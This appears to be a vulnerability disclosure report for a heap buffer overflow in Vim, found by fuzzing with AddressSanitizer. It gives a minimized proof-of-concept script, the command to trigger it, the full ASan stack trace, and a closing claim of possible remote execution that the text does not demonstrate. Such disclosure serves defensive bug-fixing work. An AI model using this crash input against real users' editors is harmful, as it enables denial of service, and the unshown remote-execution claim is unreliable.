When fuzzing vim commit 56858e4ed
(works with latest build) with clang 12 and ASan, I discovered a heap buffer overflow.
Here is minimized poc
/\%.v
5/
c
Extract then run crafted file with this command
vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!
ASan stack trace:
aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!
=================================================================
==2889370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000013d00 at pc 0x00000049a4ef bp 0x7ffffffdbf30 sp 0x7ffffffdb6f8
READ of size 4 at 0x621000013d00 thread T0
#0 0x49a4ee in __asan_memmove (/home/aldo/vim/src/vim+0x49a4ee)
#1 0x4d02e0 in vim_memsave /home/aldo/vim/src/alloc.c:597:2
#2 0x75c5f58 in u_save_line /home/aldo/vim/src/undo.c:373:16
#3 0x757d2c4 in u_saveline /home/aldo/vim/src/undo.c:3477:9
#4 0x757a246 in u_save /home/aldo/vim/src/undo.c:257:2
#5 0x43002fd in op_shift /home/aldo/vim/src/ops.c:145:9
#6 0x22d91b1 in ex_operators /home/aldo/vim/src/ex_docmd.c:7743:6
#7 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
#8 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
#9 0x5c1b974 in do_source /home/aldo/vim/src/scriptfile.c:1406:5
#10 0x5bffda5 in cmd_source /home/aldo/vim/src/scriptfile.c:971:14
#11 0x5bfdd3f in ex_source /home/aldo/vim/src/scriptfile.c:997:2
#12 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
#13 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
#14 0x203af9a in do_cmdline_cmd /home/aldo/vim/src/ex_docmd.c:594:12
#15 0x93c5f55 in exe_commands /home/aldo/vim/src/main.c:3081:2
#16 0x93a0249 in vim_main2 /home/aldo/vim/src/main.c:773:2
#17 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
#18 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#19 0x41fe2d in _start (/home/aldo/vim/src/vim+0x41fe2d)
0x621000013d00 is located 0 bytes to the right of 4096-byte region [0x621000012d00,0x621000013d00)
allocated by thread T0 here:
#0 0x49aced in malloc (/home/aldo/vim/src/vim+0x49aced)
#1 0x4cd2ac in lalloc /home/aldo/vim/src/alloc.c:244:11
#2 0x4ccfa3 in alloc /home/aldo/vim/src/alloc.c:151:12
#3 0x9426f31 in mf_alloc_bhdr /home/aldo/vim/src/memfile.c:884:21
#4 0x941b675 in mf_new /home/aldo/vim/src/memfile.c:376:26
#5 0x387b40b in ml_new_data /home/aldo/vim/src/memline.c:4068:15
#6 0x3867f37 in ml_open /home/aldo/vim/src/memline.c:394:15
#7 0x694e5f in open_buffer /home/aldo/vim/src/buffer.c:190:9
#8 0x93ae2a2 in create_windows /home/aldo/vim/src/main.c:2851:9
#9 0x939c80d in vim_main2 /home/aldo/vim/src/main.c:704:5
#10 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
#11 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vim/src/vim+0x49a4ee) in __asan_memmove
Shadow bytes around the buggy address:
0x0c427fffa750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffa760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffa770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffa780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c427fffa790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffa7a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffa7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffa7c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffa7d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffa7e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c427fffa7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2889370==ABORTING
This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution